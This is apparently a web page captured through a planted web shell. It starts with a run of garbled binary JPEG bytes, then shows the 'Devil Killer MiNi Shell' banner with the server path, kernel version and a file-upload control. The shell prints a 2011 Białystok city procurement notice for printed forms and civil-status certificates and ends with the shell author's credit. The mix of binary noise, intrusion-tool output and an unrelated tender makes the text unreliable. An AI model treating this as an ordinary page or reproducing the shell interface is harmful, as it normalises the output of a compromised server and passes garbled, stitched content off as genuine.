JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111122/303887-N-2011.html

<p class="kh_header"><b>Białystok: Sukcesywną dostawę druków akcydensowych i poligraficznych 
dla Urzędu Miejskiego w Białymstoku w 2012 roku</b><br>
<b>Numer ogłoszenia: 303887 - 2011; data zamieszczenia: 22.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białystok , ul. Słonimska 1, 15-950 Białystok, woj. podlaskie, tel. 085 869 60 02, faks 085 869 62 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywną dostawę druków akcydensowych i poligraficznych 
dla Urzędu Miejskiego w Białymstoku w 2012 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sukcesywna dostawa druków akcydensowych i poligraficznych. Zamówienie będzie dokonywane w podziale na części: 

I część zamówienia obejmuje druki poligraficzne - zgodnie z zał. Nr 2 do SIWZ 
II część zamówienia obejmuje druki akcydensowe - zgodnie z zał. Nr 3 do SIWZ 
III część zamówienia obejmuje druki akcydensowe - akty stanu cywilnego - zgodnie z zał. Nr 4 do SIWZ
2.	Zamawiający dopuszcza składanie ofert częściowych na poszczególne części zamówienia zgodnie z zakresem określonym w załącznikach nr 2,3,4 do SIWZ które stanowią jednocześnie załączniki do umowy.
3.	Wykonawca musi zapewnić załadunek transport i rozładunek dostarczonych druków. 
4.	Dostawy będą realizowane partiami, w zależności od potrzeb Zamawiającego. Wykonawca będzie realizował dostawy na druki akcydensowe w ciągu 2 dni roboczych a poligraficzne w ciągu 5 dni roboczych od pisemnego zgłoszenia przez Zamawiającego zapotrzebowania określającego asortyment                 i ilość oraz miejsce dostawy każdej partii.  
5.	Dostawy będą realizowane  w godzinach pracy Zamawiającego tj. 7:30-15:30  w poniedziałek, środa - piątek i 8:00 - 16:00 we wtorek, do wskazanej każdorazowo siedziby Zamawiającego.    
6.	Wykaz siedzib, do których będą realizowane dostawy:
a.	Białystok, ul. Słonimska 1
b.	Białystok, ul. Branickiego 9
c.	Białystok, ul. Branickiego 3/5
d.	Białystok, ul. Składowa 11
7.	Zamawiający zastrzega sobie prawo zmniejszenia lub zwiększenia podanych w załączniku nr 1, 2 i 3 zamawianych ilości, w ramach ogólnej wartości umowy (§ 3 ust.3 projektu umowy - zał. nr 5 do SIWZ) w zależności od potrzeb Zamawiającego. Zmiana ilości zamawianych dostaw nie powoduje dla Zamawiającego żadnych konsekwencji prawno-finansowych i nie będzie stanowiła zmiany umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8, 22.90.00.00-9, 79.82.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku -  dotyczy tylko I części zamówienia.
W celu potwierdzenia spełnienia warunku Wykonawca winien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, zrealizował a w przypadku świadczeń okresowych lub ciągłych, że realizuje, co najmniej 2 zamówienia polegające na dostawie druków poligraficznych i akcydensowych o wartości zamówienia min. 5 tys. PLN brutto każde  (w przypadku zamówień realizowanych - takie zamówienie wykazane przez Wykonawcę winno być juz wykonane na min. wartość 5 tys. PLN brutto) oraz załączyć dokument potwierdzający, że te dostawy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:
1)	każdy  wykonawca  zobowiązany jest złożyć oddzielnie  dokumenty określone w sekcji III.4.2 tiret 2. 2) warunki dotyczące posiadania wiedzy i doświadczenia oraz dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia  oraz sytuacji ekonomicznej i finansowej badane będą łącznie - dokumenty określone w Sekcji III.4.1. tiret 1 winien złożyć co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia;
2)	oświadczenie  o spełnieniu warunków udziału w postępowaniu określone w Sekcji III.4.1 oraz oświadczenie o braku podstaw do wykluczenia  określone w Sekcji III.4.2 tiret 1 składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy z wykonawców oddzielnie.
2. Zgodnie z art. 26 ust 2 lit. b i c ustawy, Wykonawca może polegać na wiedzy  i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów (przedstawione w formie oryginału lub notarialnie poświadczonej kopii) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy w zakresie zmiany cen będzie dopuszczalna jedynie w przypadku ustawowej zmiany stawek podatku VAT i  wyłącznie w wysokości wynikającej z tej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Białymstoku Departament Obsługi Urzędu, ul. Słonimska 1, pokój nr 01.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2011 godzina 09:45, miejsce: Urząd Miejski w Białymstoku Departament Obsługi Urzędu, 15-950 Białystok ul. Słonimska 1, pokój nr 03 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa druków poligraficznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu	Jedn. miary	Ilość szacunkowa 
Bilety opłaty targowej, bilet składa się z części A i B, perforowany w połowie, wymiary biletu:14cmx5,5cm, 7 nominałów, każdy nominał w innym kolorze (treść nadruku do uzgodnienia), zadruk obustronny w kolorze czarnym, każdy bilet numerowany, bloczki klejone i zszyte zszywką na wąskim grzbiecie wg załączonego wzoru nr 1	- bloczek (100szt)	- 600
Druki formatu A3, dwustronne-  3 rodzaje nadruku o łącznej ilości  (minimalne jednostkowe zamówienie 2000szt)szt.	- 12 000
Druki formatu A3, jednostronne - 2 rodzaje nadruku   (minimalne jednostkowe zamówienie 2000szt)szt.	- 15 000
Druki formatu A4, dwustronne - 20 rodzajów nadruku o łącznej ilości  (minimalne jednostkowe zamówienie 2000szt)szt.	- 90 000
Druki formatu A4, jednostronne -  26 rodzajów nadruku o łącznej ilości 
(minimalne jednostkowe zamówienie 2000szt) szt.	-140 000
Papier ozdobny z herbem Miasta Białegostoku format A4 gramatura min.80g/m2, struktura płótna, 4 rodzaje rozmieszczenia nadruku, zadruk w kolorze (do uzgodnienia), kolor biały	szt. -  3000
Papier ozdobny z herbem Miasta Białegostoku, format A4 gramatura min.80g/m2, struktura płótna, 4 rodzaje rozmieszczenia nadruku (do uzgodnienia), kolor ecru -szt. -	1000
Polecenie przelewu/wpłata gotówkowa (1+1), format A6, kopia kolor, (treść nadruku do uzgodnienia	bloczek (50kom)	- 2000
Teczki do akt kierowców, wymiar; 250mmx175mm, zadruk w kolorze czarnym, druk obustronny, pojedyncze bigowanie, karton biały, gramatura 270g/m2 wg załączonego wzoru nr 2	- szt. - 6 000
Wizytówki z herbem Miasta, jednostronne, karton ozdobny biały z delikatną fakturą-kratka, gramatura 300g/m2, wykonane metodą cyfrową (jednostkowe minimalne zamówienie - 100szt)	- szt.	- 5 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8, 22.90.00.00-9, 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa druków akcydensowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Opis przedmiotu	Jedn. miary	Ilość szacunkowa
1. Arkusz spisu z natury, format A4, pion, oryginał + kopia, druk jednostronny bloczek (80k)	10
2. Dziennik budowy Pb -51b - 60 kartek (kartki numerowane podwójnie) format A4, twarda oprawa, 	
szt.	
120
3. Dzienniki korespondencyjne- format A4, twarda oprawa 96 kartek 	 szt.50
4.Ewidencja sprzedaży VAT, format A4, pozioma	szt.	10
5.Ewidencja wyjść w godzinach służbowych - format A4, miękka oprawa, 16 kartek szt.	30
6.Kalendarze książkowe na rok 2012 format A5 z registrami, okładka obszywana, kalendarium 1 dzień na stronie (sobota i niedziela razem na jednej stronie), skorowidz teleadresowy zintegrowany z blokiem, perforacja narożna, papier biały, wstążka	szt.	10
7.Kalendarze książkowe na rok 2012 format A4 z registrami, okładka obszywana, kalendarium tygodniowe, skorowidz teleadresowy zintegrowany z blokiem,perforacja narożna,  wstążka	szt.	4
8.Karta ewidencyjna wyposażenia, format A5, karton biały, offsetowy gr. ok. 180g/m2, zadruk czarny obustronny	szt.	100
9.Karta parkingowa osoby niepełnosprawnej, kolor karty błękitny, napisy w kolorze czarnym, gramatura karty min.250g, karta w przezroczystym etui wg załączonego wzoru nr 1	szt.	1000
10.Karta urlopowa samokopiująca, format A6, kopia kolor	bloczek(60k)	25
11.Karta urlopowa, offsetowa, druk jednostronny, format A6 bloczek (100k.)	120
12.Karty drogowe numerowane seria Aa, druk obustronny, format A5, bloczek (100k.)	50
13.Koperta dowodowa z nadrukiem, kolor biały, format B5, wym. 250x176mm, otwierana od góry bez kleju, gr.120g/m2, wg załączonego wzoru nr 2 szt.	10 000
14.Polecenie księgowania samokopiujące, format A5, zadruk w kolorze bloczek
(60 kartek) 35
15. Polecenie przelewu - wpłata gotówkowa z nadrukiem PODATKI, (1+1), samokopia bloczek (50kom.)	 5
16.Polecenie przelewu - wpłata gotówkowa ZUS, (1+1), format A6, samokopia	bloczek (50kom.)	 5
17.Polecenie przelewu - wpłata gotówkowa (1+1), samokopia, format A6bloczek
(50kom.)	100
18.Polecenie przelewu - wpłata gotówkowa (1+3), samokopia, format A6 bloczek (25kom.)	 20
19. Polecenie wyjazdu służbowego, druk dwustronny, format A5, 	bloczek(100kartek)	10
20. Roczna karta ewidencji obecności, format A5. 	szt.	50
21. Teczka akta osobowe wykonana w twardej oprawie introligatorskiej, grzbiet szer.2,5cm, przekładki A,B,C	szt.	50
22. Wezwanie do złożenia wyjaśnień KPA-9 (art.50KPA), format A6	szt.	120
23. Zbiorcze polecenie przelewów, format 2/3 A6, samokopia typu K-404 S bloczek
(30x2k)	10
24. Zgłoszenie pobytu czasowego trwającego ponad 3 miesiące, format A5	
bloczek (100k)	 120
25. Zgłoszenie pobytu stałego, format A5	bloczek (100k)	120
26. Zgłoszenie powrotu z wyjazdu poza granice Rzeczypospolitej Polskiej trwającego dłużej niż 6 miesięcy, format A5	bloczek (100k)	50
27. Zgłoszenie wyjazdu poza granice Rzeczypospolitej Polskiej, format A5 bloczek
 (100k)	80
28. Zgłoszenie wymeldowania z pobytu czasowego ponad 3 miesiące, format A5
bloczek(100k)	60
29.Zgłoszenie wymeldowania z pobytu stałego, format A5	bloczek (100k)	100
30. Zwrotne potwierdzenie odbioru, z odrywaną perforacją, gramatura ok. 160g/m2 wg załączonego wzoru nr 3	szt.	30 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8, 22.90.00.00-9, 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa druków akcydensowych - aktów stanu cywilnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Akt urodzenia pojedynczy 	M-1p	szt.	2.000
Akt zgonu pojedynczy	M-3p	szt.	1.000
Odpis skrócony aktu małżeństwa (ze znakiem wodny format A5)	M-13	szt.	5.000 
Odpis skrócony aktu małżeństwa do użytku wewnętrznego format A5	M-13a	szt.	3.000
Odpis skrócony aktu urodzenia (ze znakiem wodnym format A5)	M-8	szt.	18.000
Odpis skrócony aktu urodzenia do użytku wewnętrznego format A5	M-8a	szt.	2.000
Odpis skrócony aktu zgonu (ze znakiem wodnym  format A5)	M-15	szt.	9.000
Odpis skrócony aktu zgonu do użytku wewnętrznegoformat A5	M-15a	szt.	6.000
Odpis zupełny aktu urodzenia (ze znakiem wodnym format A5)	M-4	szt.	1.500
Odpis zupełny aktu zgonu (ze znakiem wodnymformat A5)	M-6	szt.	500
Wielojęzyczny odpis skrócony aktu małżeństwa format A5	M-211	szt.	1.000
Zapewnienie papier biały offset 80g, format 1/2A3 (420  148mm)	M-17szt.	500
Zaświadczenie o zdolności prawnej do zawarcia małżeństwa za granicą (ze znakiem wodnym format A4)	M-73/M-200	szt.	300
Zaświadczenie stwierdzające brak okoliczności wyłączających zawarcie małżeństwa  (ze znakiem wodnym format A4)	
M-72/M-201	szt.   1.500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8, 22.90.00.00-9, 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com